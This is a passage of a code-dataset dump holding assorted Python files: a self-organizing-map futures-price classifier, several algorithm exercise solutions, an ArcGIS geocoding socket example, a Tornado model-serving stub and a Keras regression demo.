self.FeatureExtraction(iteration)\n            self.spldata.append(features)  # store the features grouped per image\n            self.allfeature.extend(features)  # flat list of features, without grouping\n    def kernel_random_weights_init(self):\n        \"\"\"Initializes the weights of the SOM\n        picking random samples from data.\"\"\"\n        # pick random samples from the data as the initial weights\n\n        self._check_input_len(self.allfeature)\n        it = nditer(self._activation_map, flags=['multi_index'])\n        while not it.finished:\n            rand_i = self._random_generator.randint(len(self.allfeature))\n            self._weights[it.multi_index] = self.allfeature[rand_i]\n            it.iternext()\n\n    # custom code: extract matrix features with a sliding window to use as input\n    def FeatureExtraction(self, matrixs):  # each matrix is a grayscale image array\n        features = []\n        for matrix in matrixs:\n            # matrix = np.array(matrix)\n            row, loc = matrix.shape\n            # matrix = matrix.reshape(row,loc)\n            for i in range(0, row - self.kernel[0] + 1, self.stride):\n                for j in range(0, loc - self.kernel[1] + 1, self.stride):\n                    feature = []  # feature vector\n                    for m in range(self.kernel[0]):\n                        for n in range(self.kernel[1]):\n                            pixel = matrix[i + m][j + n]\n                            feature.extend([pixel])\n\n                    # apply HOG here to compute the gradient histogram\n                    # the HOG parameters are set here\n                    image = np.array(feature).reshape(self.kernel[0], self.kernel[1])\n                    size = tuple(self.kernel)\n                    winSize = size\n                    blockSize = size\n                    blockStride = (1, 1)  # None#(1,1)\n                    cellSize = size\n                    nbins = self._input_len  # 9\n                    # create the hog descriptor with the parameters defined above; everything else keeps its default\n                    hog = cv2.HOGDescriptor(winSize, blockSize, blockStride, cellSize, nbins)\n                    winStride = None  # (1,1)\n                    # padding = (8,8) , padding , winStride\n                    image = np.uint8(image * 255)\n                    hog_result = 
hog.compute(image).reshape(-1, )\n                    print(\"hog_result\", hog_result)\n                    features.append(np.array(hog_result))\n                    # print(\"gradient histogram\", hog_result)\n        # print(\"features\",features)\n        # print(\"feature count\", len(features))\n        return features  # returns an array holding all features of one image\n\n\n    def distance_map(self):\n        \"\"\"Returns the distance map of the weights.\n        Each cell is the normalised sum of the distances between\n        a neuron and its neighbours. Note that this method uses\n        the euclidean distance.\"\"\"\n        # returns the distance matrix between the weight vectors\n        um = zeros((self._weights.shape[0],\n                    self._weights.shape[1],\n                    8))  # 2 spots more for hexagonal topology\n\n        ii = [[0, -1, -1, -1, 0, 1, 1, 1]]*2\n        jj = [[-1, -1, 0, 1, 1, 1, 0, -1]]*2\n\n        if self.topology == 'hexagonal':\n            ii = [[1, 1, 1, 0, -1, 0], [0, 1, 0, -1, -1, -1]]\n            jj = [[1, 0, -1, -1, 0, 1], [1, 0, -1, -1, 0, 1]]\n\n        for x in range(self._weights.shape[0]):\n            for y in range(self._weights.shape[1]):\n                w_2 = self._weights[x, y]\n                e = y % 2 == 0   # only used on hexagonal topology\n                for k, (i, j) in enumerate(zip(ii[e], jj[e])):\n                    if (x+i >= 0 and x+i < self._weights.shape[0] and\n                            y+j >= 0 and y+j < self._weights.shape[1]):\n                        w_1 = self._weights[x+i, y+j]\n                        um[x, y, k] = fast_norm(w_2-w_1)\n\n        um = um.sum(axis=2)\n        return um/um.max()\n\n    def activation_response(self, data):\n        \"\"\"\n        Returns a matrix where the element i,j is the number of times\n        that the neuron i,j has been the winner.\n        \"\"\"\n        self._check_input_len(data)\n        a = zeros((self._weights.shape[0], self._weights.shape[1]))\n        for x in data:\n            a[self.winner(x)] += 1\n        return a\n\n    def _distance_from_weights(self, data):\n        \"\"\"Returns a matrix d where d[i,j] is the euclidean distance between\n        data[i] and the j-th weight.\n        \"\"\"\n        input_data = array(data)\n        weights_flat = self._weights.reshape(-1, self._weights.shape[2])\n        input_data_sq = power(input_data, 2).sum(axis=1, keepdims=True)\n        weights_flat_sq = power(weights_flat, 2).sum(axis=1, keepdims=True)\n        cross_term = dot(input_data, weights_flat.T)\n        return sqrt(-2 * cross_term + input_data_sq + weights_flat_sq.T)\n\n    def quantization_error(self, data):\n        \"\"\"Returns the quantization error computed as the average\n        distance between each input sample and its best matching unit.\"\"\"\n        self._check_input_len(data)\n        return norm(data-self.quantization(data), axis=1).mean()\n\n    def topographic_error(self, data):\n        \"\"\"Returns the topographic error computed by finding\n        the best-matching and second-best-matching neuron in the map\n        for each input and then evaluating the positions.\n\n        A sample for which these two nodes are not adjacent counts as\n        an error. 
The topographic error is given by the\n        total number of errors divided by the total number of samples.\n\n        If the topographic error is 0, no error occurred.\n        If 1, the topology was not preserved for any of the samples.\"\"\"\n        self._check_input_len(data)\n        if self.topology == 'hexagonal':\n            msg = 'Topographic error not implemented for hexagonal topology.'\n            raise NotImplementedError(msg)\n        total_neurons = prod(self._activation_map.shape)\n        if total_neurons == 1:\n            warn('The topographic error is not defined for a 1-by-1 map.')\n            return nan\n\n        t = 1.42\n        # b2mu: best 2 matching units\n        b2mu_inds = argsort(self._distance_from_weights(data), axis=1)[:, :2]\n        b2mu_xy = unravel_index(b2mu_inds, self._weights.shape[:2])\n        b2mu_x, b2mu_y = b2mu_xy[0], b2mu_xy[1]\n        dxdy = hstack([diff(b2mu_x), diff(b2mu_y)])\n        distance = norm(dxdy, axis=1)\n        return (distance > t).mean()\n\n    def win_map(self, data):\n        \"\"\"Returns a dictionary wm where wm[(i,j)] is a list\n        with all the patterns that have been mapped in the position i,j.\"\"\"\n        self._check_input_len(data)\n        winmap = defaultdict(list)\n        for x in data:\n            winmap[self.winner(x)].append(x)\n        return winmap\n\n    def Forecast(self, random_order=False, verbose=False):\n        \"\"\"forecast\n\n        Parameters\n        ----------\n        verbose : bool (default=False)\n            If True the status of the training\n            will be printed at each iteration.\n        \"\"\"\n\n        ''' \n        1. iterate over w, computing the distance between every x and w to obtain the membership degrees\n        2. update w until it is stable\n        3. find and record the winning neuron for each x\n        '''\n        # after iterating, compute the positional feature mapping\n        features_map=[]  # list of the winning-neuron coordinates for all images\n        if random_order:\n            random_generator = self._random_generator\n        for pic in self.spldata:  # iterate over the data\n            # the features were already extracted from the data\n            feature_map = []  # winning nodes for all features of one image, used for the next layer's mapping\n            for feature in pic:  # iterate over the features contained in each image\n                win = self.winner(feature)\n                num =win[0]*self.y+win[1]  # encode the winner coordinates as a single flattened index\n                feature_map.extend([int(num)])\n            #print(\"winning neuron coordinate mapping\", feature_map)\n            features_map.append(feature_map)  # store the winning neurons for this image's features\n            if verbose:\n                print('\\n quantization error:', self.quantization_error(self.allfeature))\n        return array(features_map)\n\nclass back_propagation:\n    def __init__(self,modelname):\n\n        self.model = tf.keras.models.load_model(str(modelname))  # initialize the model\n    def forecast(self,test_x,test_y):\n        test_x = np.array(test_x).reshape(1,-1)\n        test_y = np.array(test_y).reshape(1,-1)\n        acc = self.model.evaluate(test_x,test_y)\n        predict_x = self.model.predict(test_x)\n        return acc,predict_x\n\n# the code below is custom-written\n\ndef classify(som,data,winmap):\n    from numpy import sum as npsum\n    default_class = npsum(list(winmap.values())).most_common()[0][0]\n    result = []\n    for d in data:\n        win_position = som.winner(d)\n        if win_position in winmap:\n            result.append(winmap[win_position].most_common()[0][0])\n        else:\n            result.append(default_class)\n    return result\n\ndef integrate(firstfeaturesmap,secondfeaturesmap):\n    # first normalize the two feature maps\n    normfeature = MinMaxScaler()\n    firstfeature = firstfeaturesmap.shape\n    secondfeature = secondfeaturesmap.shape\n    firstfeaturesmap = normfeature.fit_transform(firstfeaturesmap.reshape(-1, 1))\n    firstfeaturesmap = firstfeaturesmap.reshape(firstfeature)\n    secondfeaturesmap = normfeature.fit_transform(secondfeaturesmap.reshape(-1, 1))\n    secondfeaturesmap = secondfeaturesmap.reshape(secondfeature)\n    # merge the features\n    featuresmap = []\n    x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12,13,14,15,16,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50]\n    x = list(map(lambda num: num * num, x))\n    lg = len(firstfeaturesmap[0]) + len(secondfeaturesmap[0])\n    print(len(firstfeaturesmap[0]))\n    print(len(secondfeaturesmap[0]))\n    
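# pad the merged vector with zeros up to the nearest listed perfect square so it can be reshaped into a square kernel matrix below\n    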
print(\"attribute count\", lg)\n    if lg>max(x):\n        print(\"too many attributes\")\n    x = list(map(lambda num: num-lg , x))\n    temp = []\n    for i in range(len(x)):\n        if x[i] >= 0:\n            temp.extend([x[i]])\n    print(\"min(temp)\",min(temp))\n    zo = np.zeros([min(temp)])\n    zo = list(zo)\n    for i in range(len(firstfeaturesmap)):\n        tempmap = []\n        tempmap.extend(firstfeaturesmap[i])\n        tempmap.extend(secondfeaturesmap[i])\n        tempmap.extend(zo)\n        l = int(pow(len(tempmap), 0.5))\n        tempmap = np.array(tempmap).reshape(l,l)\n        featuresmap.append([tempmap])  # the SOM loops one extra level: rgb images have three matrices, hence the extra [ ]\n    # if not isinstance(pow(len(featuresmap[0]),0.5),int):  # this expression yields a float\n    #     print(\"list padding is wrong\")\n    #print(\"featuresmap[0][0][0]\",featuresmap[0][0][0])\n    #print(\"int(pow(len(featuresmap[0][0]),0.5))\",int(pow(len(featuresmap[0][0][0]),0.5)))\n    print(\"kernel dimension\", l)\n    return featuresmap,l  # int(pow(len(featuresmap[0][0]),0.5))\n\n\n\ndef vec2matrix2vec(vector):\n    '''Maps the trend of a vector into a matrix.\n    For each vector element build the corresponding row vector; stacking these rows into a matrix and transposing it gives the trend chart.'''\n    vector = pre.minmax_scale(vector)\n    matrix=[]\n    for i in range(len(vector)):\n        temp=[]\n        location=vector[i]//0.1\n        #print(location)\n        for j in range(len(vector)):\n            if j==location:\n                temp.append(1.0)  # 1.0 is a placeholder; vector[i] would also work\n            else:\n                temp.append(0)\n        matrix.append(temp)  # only after transposing does this show the upward pattern\n    matrix = np.array(matrix).T\n    vec = matrix.reshape(-1)\n    #print(list(vec))\n    #return np.mat(matrix)\n    return vec\n\ndef statistics(origin, predicted):\n    #compute RMSE\n    from sklearn.metrics import mean_squared_error\n    mse = mean_squared_error(origin, predicted)  # mean squared error\n    rmse = np.sqrt(mse)\n    mape = (sum(abs(origin - predicted))) / len(origin)\n    return mse, rmse, mape\n\n# normalize data set into [0, 1] or [-1, 1]\ndef normalize(ori_data, flag='01'):\n    data = ori_data.copy()\n    minV = np.min(data)\n    maxV = np.max(data)\n    if np.abs(maxV - minV) > 0.00001:\n        data = 2 * (data - minV) / (maxV - minV) - 1\n    return data, maxV, minV\n# re-normalize data set from [0, 1] or [-1, 1] into its true dimension\ndef re_normalize(ori_data, maxV, minV, flag='01'):\n    data = ori_data.copy()\n    if np.abs(maxV - minV) > 0.00001:\n        if flag == '01':  # normalize to [0, 1]\n            data = data * (maxV - minV) + minV\n        else:\n            data = (data + 1) * (maxV - minV) / 2 + minV\n    return data\n\n# process the data\ndef processdata(way):\n    data = pd.DataFrame(pd.read_csv(way, header=0))\n    norm = MinMaxScaler()  # for normalizing the data\n    arrdata = np.array(data)\n    # datetemp = list(arrdata[:, 0])\n    # date = list(set(datetemp))\n    # date.sort(key=datetemp.index)  # sort the deduplicated dates back into their original order\n    # split all data into 30-minute chunks; one trading day is four hours, 240 minutes\n    list_data = []\n    for i in range(0, len(data), 30):\n        list_data.append(arrdata[i:i + 30, :])  # columns: date, time, open, high, low, close, volume, turnover\n    # print(len(list_data))\n    results = []\n    # stack the chunks vertically in groups of ten 30-minute windows\n    for j in range(len(list_data) - 11):\n        r = np.zeros([100, 10])  # down moves; one row represents 0.01\n        g = np.zeros([100, 10])  # up moves\n        b = np.zeros([100, 10])  # volume\n        # if j >= 10:\n        #     break\n        temp = np.concatenate((list_data[j], list_data[j + 1], list_data[j + 2], list_data[j + 3], list_data[j + 4],\n                               list_data[j + 5], list_data[j + 6], list_data[j + 7], list_data[j + 8],\n                               list_data[j + 9]), axis=0)  # ten windows in total, stacked vertically\n        # after stacking, normalize the prices and draw the image\n        price = np.array(temp[:, 3:7], dtype='float')\n        volume = np.array(temp[:, 7], dtype='int')\n        # this holds the ten windows of data\n        norm_price = norm.fit_transform(price.reshape(-1, 1))  # normalize the prices\n        norm_volume = norm.fit_transform(volume.reshape(-1, 1))  # normalize the volume\n        norm_price = norm_price.reshape(-1, 4)\n        # split the normalized prices back into windows\n        days_normprice = []\n        days_normvolume = []\n        days_volume = []\n        for k in range(0, len(norm_price), 30):\n            days_normprice.append(norm_price[k:k + 30, :])\n            
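# keep the normalized and raw volume windows aligned with the same 30-minute price windows\n            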
days_normvolume.append(norm_volume[k:k + 30, :])\n            days_volume.append(volume[k:k + 30])\n        # draw the image day by day\n        for l in range(len(days_normprice)):\n            norm_open = float(days_normprice[l][0, 0])  # open price\n            norm_close = float(days_normprice[l][-1, 3])  # close price\n            norm_high = float(max(days_normprice[l][:, 1]))  # high price\n            norm_low = float(min(days_normprice[l][:, 2]))  # low price\n            print('open', norm_open, 'high', norm_high, 'low', norm_low, 'close', norm_close)\n            loc_open = round(norm_open / 0.01)  # row position of the open price, rounded\n            loc_high = round(norm_high / 0.01)  # row position of the high price\n            loc_low = round(norm_low / 0.01)  # row position of the low price\n            loc_close = round(norm_close / 0.01)  # row position of the close price\n            body = loc_close - loc_open\n            upper_shadow = loc_high - max([loc_open, loc_close])\n            lower_shadow = min(loc_open, loc_close) - loc_low\n            if loc_close == 100:\n                loc_close = 99\n            if loc_high == 100:\n                loc_high = 99\n            if loc_open == 100:\n                loc_open = 99\n            if loc_low == 100:\n                loc_low = 99\n            print('body', body, \"upper_shadow\", upper_shadow, \"lower_shadow\", lower_shadow)\n            if body >= 0:  # up candle: update the g matrix\n                g[loc_close:loc_high, l] = 0.5  # upper shadow\n                g[loc_open:loc_close, l] = 1  # body\n                g[loc_low:loc_open, l] = 0.5  # lower shadow\n                if loc_open == loc_close:\n                    g[loc_open, l] = 1  # body\n                # print(\"g\",g)\n            else:  # down candle, body < 0\n                r[loc_open:loc_high, l] = 0.5  # upper shadow\n                r[loc_close:loc_open, l] = 1  # body\n                r[loc_low:loc_close, l] = 0.5  # lower shadow\n                if loc_open == loc_close:\n                    r[loc_open, l] = 1  # body\n                # print(\"r\", r)\n            # the volume updates the b matrix\n            for m in range(len(days_normprice[l])):\n                begin_loc = int(round(days_normprice[l][m, 2] / 0.01))\n                end_loc = int(round(days_normprice[l][m, 1] / 0.01))\n                if begin_loc == 100:\n                    begin_loc=99\n                if end_loc == 100:\n                    end_loc = 99\n                # now_volume = days_normvolume[l][m]\n                now_volume = days_volume[l][m]\n                length = end_loc - begin_loc\n                if length ==0:\n                    b[begin_loc, l] = round(now_volume / 1) + b[begin_loc,l]\n                else:\n                    b[begin_loc:end_loc, l] = round(now_volume / length) + b[begin_loc:end_loc, l]  # the volume of this price range is spread evenly across the interval\n            # print('b',b)\n        #print(\"max volume\", max(max(b.reshape(1, -1))))\n        b = norm.fit_transform(b.reshape(-1, 1))  # normalize the volume\n        b = b.reshape(100, 10)\n        results.append([r,g,b])\n    return results\ndef get_bpdata(path,loc,classies):\n    norm = MinMaxScaler()\n    data = pd.DataFrame(pd.read_csv(path, header=None))\n    arrdata = np.array(data)\n    print(arrdata[loc])\n    maxV = max(np.array(arrdata[:,2:6]).reshape(-1,1))\n    minV = min(np.array(arrdata[:,2:6]).reshape(-1,1))\n    normarrdata = norm.fit_transform(arrdata[:,2:6])\n    adata = []\n    alable = []\n    normadata = []\n    normlable = []\n    if len(classies) == 1:  # len(arrdata)-11:\n        for z in range(2, 6):\n            for y in range(10):\n                adata.extend([arrdata[loc + y][z]])\n                normadata.extend([normarrdata[loc + y][z-2]])\n        alable.extend([arrdata[loc + 11][z]])\n        normlable.extend([normarrdata[loc + 11][z-2]])\n    else:\n        print(\"classies length is not 1, result is\", classies)\n    return adata,normadata, alable, normlable,maxV,minV\n# record the post-training classification of the data\ndef save_data(classies,way2):\n    csvFile = \"Traindatalocation.csv\"\n    data = pd.DataFrame(pd.read_csv(way2,header=None))\n    arrdata = np.array(data)\n    arralldata = []\n    if len(classies)==len(arrdata)-11:\n        for x in range(len(arrdata)-11):\n            temp = []\n            for z in range(2,6):\n                for y in range(10):\n                    temp.extend([arrdata[x+y][z]])\n            #label\n            # temp.extend([arrdata[x+11][2]])\n            # temp.extend([arrdata[x + 11][3]])\n            # temp.extend([arrdata[x + 11][4]])\n            temp.extend([arrdata[x + 11][5]])  # only the close price is kept\n            #temp.append([arrdata[x+11][2],arrdata[x+11][3],arrdata[x+11][4],arrdata[x+11][5]])\n            temp.append(int(classies[x][0]))\n            # record the data\n            with open(csvFile, 'a', 
newline='') as f:  # condition met, record the data\n                csv.writer(f).writerow(temp)\n            f.close()\n    else:\n        print(\"classification length mismatch\")\n        print(\"len(classies)\",len(classies))\n        print(\"len(arrdata)\",len(arrdata))\ndef main():\n    #EDSOM\n    np.set_printoptions(suppress=True)\n    count = 0\n    way = \"F:\\论文实验\\FEDSOMRGBHOGfutures3\\mintraintest\"\n    arralldata = processdata(way)  # the rgb matrix features, already normalized\n    # these are the rgb matrices\n    vec = arralldata  # holds three matrices [r, g, b] per image\n    Epsilon = 0.05  # no longer used\n    som1 = MiniSom(vec,15, 15, 9,[10,10],1, Epsilon,sigma=3, learning_rate=0.5)\n    som1.forecast_weights_init('som1w.npy')\n    firstfeaturesmap = som1.Forecast(verbose=False)  # returns the feature map\n\n    som2 = MiniSom(vec,15, 15, 9, [8, 8], 1, Epsilon,sigma=3, learning_rate=0.5)\n    som2.forecast_weights_init('som2w.npy')\n    secondfeaturesmap = som2.Forecast(verbose=False)  # returns the feature map\n\n    featuresmap,l = integrate(firstfeaturesmap,secondfeaturesmap)  # merge the two feature maps\n    featuresmap = array(featuresmap)  # the input is an array merging the training results of the first two layers\n    #print(\"featuresmap\",featuresmap)\n    som3 = MiniSom(featuresmap,8, 8, 9,[l,l],1, Epsilon,sigma=3, learning_rate=0.5)\n    som3.forecast_weights_init('som3w.npy')\n    classies = som3.Forecast(verbose=False)  # the input is the mapping, without normalization\n\n    print(\"len(classies)\", len(classies))\n    way2 = \"F:\\论文实验\\FEDSOMRGBHOGfutures3\\daytraintest\"  # location of the 30-minute data\n    # save the data\n    save_data(classies, way2)\n\n\n\nif __name__==\"__main__\":\n    main()","sub_path":"computeloc.py","file_name":"computeloc.py","file_ext":"py","file_size_in_byte":33886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"424566815","text":"from sys import stdin\n# stdin = open('input.txt', 'r')\ninput = stdin.readline\n\nn = int(input())\nfor _ in range(n):\n    rs = []\n    ls = []\n    s = input().rstrip()\n    for i in s:\n        if i == \"<\":\n            if ls:\n                rs.append(ls.pop())\n        elif i == \">\":\n            if rs:\n                ls.append(rs.pop())\n        elif i == \"-\":\n            if ls:\n                ls.pop()\n        else:\n            ls.append(i)\n    print(\"\".join(ls), end=\"\")\n    print(\"\".join(reversed(rs)))","sub_path":"210613/5397.py","file_name":"5397.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"104958369","text":"# -*- coding:utf-8 -*-\r\n# Author: washing\r\n# DateTime: 2020/9/5 18:56\r\n# File: 0470.py\r\n# Desc: \r\n\r\nfrom typing import List\r\n\r\nclass Solution:\r\n    def findMaxForm(self, strs: List[str], m: int, n: int) -> int:\r\n        def num_counter(strs):\r\n            num01 = []\r\n            num01.append(strs.count(\"0\"))\r\n            num01.append(strs.count(\"1\"))\r\n            return num01\r\n\r\n        dp = []\r\n        for i in range(m+1):\r\n            dp.append([0]*(n+1))\r\n        length = len(strs)\r\n        for i in range(length):\r\n            num01 = num_counter(strs[i])\r\n            num0 = num01[0]\r\n            num1 = num01[1]\r\n            for j in range(m, num0-1, -1):\r\n                for k in range(n, num1-1, -1):\r\n                    dp[j][k] = max(dp[j][k], dp[j-num0][k-num1]+1)\r\n        return dp[m][n]\r\n\r\n","sub_path":"Solutions/0470/0470.py","file_name":"0470.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"496575321","text":"\"\"\"\n    Uses sockets to retrieve raw data from google maps. 
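(Note: despite the wording, the request below targets the ArcGIS geocoding service rather than Google Maps.) 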
Last 5 lines\n parse the raw response, extract the HTTP body from the HTTP response,\n parse it, and display the name of the first result.\n\"\"\"\nimport json\nimport socket\nfrom urllib.parse import quote_plus\nfrom io import StringIO\n\nrequest_str = \"\"\"\\\nGET /arcgis/rest/services/World/GeocodeServer/find?f=json&text={0}&maxLocations=1 HTTP/1.1\\r\\n\\\nHost: geocode.arcgis.com:80\\r\\n\\\nUser-Agent: 12_socket_geocode.py\\r\\n\\\nConnection: close\\r\\n\\\n\\r\\n\\\n\"\"\"\n\naddress = 'Walt Disney World, Lake Buena Vista, FL'\n\nsock = socket.socket()\nsock.connect(('geocode.arcgis.com', 80))\n\nrequest = request_str.format(quote_plus(address))\nsock.sendall(request.encode('ascii'))\nresponse = []\nwhile True:\n data = sock.recv(4096)\n if not data:\n break\n response.append(data)\n\nresponse_str = b''.join(response).decode()\nprint('Raw response\\n', response_str)\n\nresponse_lines = StringIO(response_str).readlines()\nfor count, line in enumerate(response_lines):\n if len(line.strip()) == 0:\n json_response = response_lines[count+1:]\n break\n\ngeo_object = json.loads(''.join(json_response))\ngeo_object = geo_object.get('locations', [{}])[0]\nprint(geo_object.get('name', 'addr not found'))","sub_path":"Optum Tech/IN1468 available until 12-31-20/IN1468_student_files/student_files/ch04_network_prog/12_socket_geocode.py","file_name":"12_socket_geocode.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"443370036","text":"class Solution:\n '''\n Slding Window\n '''\n def longestOnes(self, nums: List[int], k: int) -> int:\n start, result = 0, 0\n for i in range(len(nums)):\n if nums[i] == 0:\n k -= 1\n while k < 0:\n if nums[start] == 0:\n k += 1\n start += 1\n result = max(result, i-start+1)\n return result","sub_path":"1004.MaxConsecutiveOnesIII.py","file_name":"1004.MaxConsecutiveOnesIII.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"26932790","text":"import tornado\n\nimport logging\nimport tornado.escape\nimport tornado.ioloop\nimport tornado.web\n\nfrom tornado.concurrent import Future\nfrom tornado import gen\nfrom tornado.options import define, options\n\nimport os.path\nimport uuid\nimport json\nimport boto3\nimport argparse\n\nfrom models import ModelHandler\n\ndefine(\"port\", default=8888, help=\"run on the given port\", type=int)\ndefine(\"debug\", default=True, help=\"run in debug mode\")\n\n\nclass MainHandler(tornado.web.RequestHandler):\n SUPPORTED_METHODS = ('GET')\n\n def get(self):\n message = 'You have reached the mdf server, please make some furniture'\n self.set_status(200, reason='All the wood is good')\n self.write(message)\n\n\nclass InfoHandler(tornado.web.RequestHandler):\n SUPPORTED_METHODS = ('GET')\n\n def initialize(self, metadata):\n self.metadata = metadata\n\n def get(self):\n self.set_status(200, reason='metadata found')\n self.write(self.metadata)\n\n\nclass PredictHandler(tornado.web.RequestHandler):\n SUPPORTED_METHODS = ('POST')\n\n def initialize(self, model):\n self.model = model.copy()\n\n @gen.coroutine\n def post(self):\n # unpack arguments\n newdata = json.loads(self.get_body_argument)\n # make prediction\n result = yield self.model.predict(newdata)\n self.set_status(200, 'I have seen the future and the future has seen me')\n self.write(result)\n\nclass TrainHandler(tornado.web.RequestHandler):\n SUPPORTED_METHODS = ('POST')\n\n def 
initialize(self, model):\n        self.model = model.copy()\n\n    @gen.coroutine\n    def post(self):\n        # unpack arguments (mirrors PredictHandler)\n        newdata = json.loads(self.get_body_argument)\n        # train the model\n        result = yield self.model.train(newdata)\n        self.set_status(200, 'I have seen the past and the past believes in me')\n        self.write(result)\n\n\ndef main(args):\n\n    options['port'] = args.port\n\n    mh = ModelHandler(args.config)\n    metadata = mh.info()\n    mh.load(args.model)\n\n    app = tornado.web.Application(\n        [\n            (r\"/\", MainHandler),\n            (r\"/info\", InfoHandler, metadata),\n            (r\"/predict\", PredictHandler, mh),\n            (r\"/train\", TrainHandler, mh),\n        ],\n        cookie_secret=\"__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__\",\n        # template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n        # static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n        xsrf_cookies=True,\n        debug=options.debug,\n    )\n    app.listen(options.port)\n    tornado.ioloop.IOLoop.current().start()\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description='medium density framework server')\n    parser.add_argument('--port', type=int, default=8888, help='port number to listen on')\n    parser.add_argument('--model', type=str, default=None, help='path to a pre-trained model')\n    parser.add_argument('--config', type=str, default=None, help='path to a yaml file containing metadata about the model')\n    args = parser.parse_args()\n\n    main(args)\n","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"283503142","text":"# https://leetcode.com/problems/add-two-numbers-ii/#/description\n\n# Definition for singly-linked list.\n# class ListNode(object):\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nclass Solution(object):\n    def addTwoNumbers(self, l1, l2):\n        \"\"\"\n        :type l1: ListNode\n        :type l2: ListNode\n        :rtype: ListNode\n        \"\"\"\n        head = l1\n        l1 = node = None\n        while head:\n            node = head\n            head = head.next\n            node.next = l1\n            l1 = node\n        \n        head = l2\n        l2 = node = None\n        while head:\n            node = head\n            head = head.next\n            node.next = l2\n            l2 = node\n        \n        carry = 0\n        ptr1 = l1\n        ptr2 = l2\n        res = None\n        while ptr1 or ptr2 or carry>0:\n            sum = carry\n            if ptr1:\n                sum += ptr1.val\n                ptr1 = ptr1.next\n            if ptr2:\n                sum += ptr2.val\n                ptr2 = ptr2.next\n            carry = int(sum / 10)\n            sum = sum % 10\n            node = ListNode(sum)\n            node.next = res\n            res = node\n        \n        return res\n","sub_path":"add-two-numbers-ii.py","file_name":"add-two-numbers-ii.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"363929739","text":"# r2 = regression index (coefficient of determination) / its max value is 1\n# often used instead of accuracy in linear regression\n\nimport numpy as np\n\n#1. Data\nx_train=np.array([1,2,3,4,5,6,7,8,9,10]) # data to train on\ny_train=np.array([1,2,3,4,5,6,7,8,9,10]) # data to train on\nx_test=np.array([11,12,13,14,15]) # data to evaluate on: it must not influence the training data\ny_test=np.array([11,12,13,14,15]) # data to evaluate on\nx_pred=np.array([16,17,18]) # data to produce predictions for\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\n\n#2. Model construction\nmodel=Sequential()\nmodel.add(Dense(300, input_dim=1)) \nmodel.add(Dense(700)) \nmodel.add(Dense(1000))\nmodel.add(Dense(1))\n\n#3. Compile, train\nmodel.compile(loss='mse', optimizer='adam', metrics=['mae']) \nmodel.fit(x_train, y_train, epochs=100, batch_size=1) \n\n\n#4. 
Evaluate, predict\nloss=model.evaluate(x_test, y_test, batch_size=1)\nprint(\"loss : \", loss)\n#print(\"acc : \", acc)\n\ny_predict=model.predict(x_test)\nprint('prediction results : \\n',y_predict)\n\n\n# RMSE (the square root of the MSE) : user-defined\nfrom sklearn.metrics import mean_squared_error\n\ndef RMSE(y_test, y_predict) :\n    return np.sqrt(mean_squared_error(y_test, y_predict))\n\nprint(\"RMSE : \", RMSE(y_test, y_predict))\n\n\n# R2 : used for regression models instead of accuracy, but it cannot be fully trusted on its own, so it is used together with RMSE \nfrom sklearn.metrics import r2_score \n\nr2=r2_score(y_test, y_predict)\nprint(\"R2 : \", r2)","sub_path":"Study/keras/keras07_r2.py","file_name":"keras07_r2.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"309426432","text":"\n\ndef solution(N, P, Q):\n    answer = list()\n    if N == 1:\n        for idx in range(len(P)):\n            answer.append(0)\n        return answer\n    primes = sieves(N)\n    semiPrimesList = semiPrimes(primes, N)\n    prefSumArr = prefixSum(semiPrimesList)\n    for idx, values in enumerate(P):\n        answer.append(prefSumArr[Q[idx]] - prefSumArr[values-1])\n    return answer\n\n#construct array of primes up to N/2\ndef sieves(N):\n    sieve = [True] * ((N+2)//2)\n    sieve[0] = sieve[1] = False\n    i = 2\n    while (i * i <= ((N+1)//2)):\n        if(sieve[i]):\n            k = i*i\n            while(k<=((N+1)//2)):\n                sieve[k] = False\n                k += i\n        i +=1\n    return sieve\n\n#construct array of semiprimes up to N\ndef semiPrimes(sieve, N):\n    semiPrimes = [0] * (N+1)\n    i = 2\n    while(i*i <= N):\n        if(sieve[i]):\n            secondMultiplicator = i\n            while(secondMultiplicator <= N//2 and i * secondMultiplicator <= N):\n                if(sieve[secondMultiplicator]):\n                    semiPrimes[secondMultiplicator * i] = True\n                    secondMultiplicator += 1\n                else:\n                    secondMultiplicator +=1\n        i += 1\n    return semiPrimes\n\n#create a prefixsum array of semiprimes up to N\ndef prefixSum(semiPrimesList):\n    lenSemis = (len(semiPrimesList))\n    prefixSumArray = [0] * lenSemis\n    for i in range(lenSemis):\n        if(semiPrimesList[i]):\n            prefixSumArray[i] = prefixSumArray[i-1] + 1\n        else:\n            prefixSumArray[i] = prefixSumArray[i-1]\n    return prefixSumArray","sub_path":"Lesson 11/CountSemiPrimes.py","file_name":"CountSemiPrimes.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
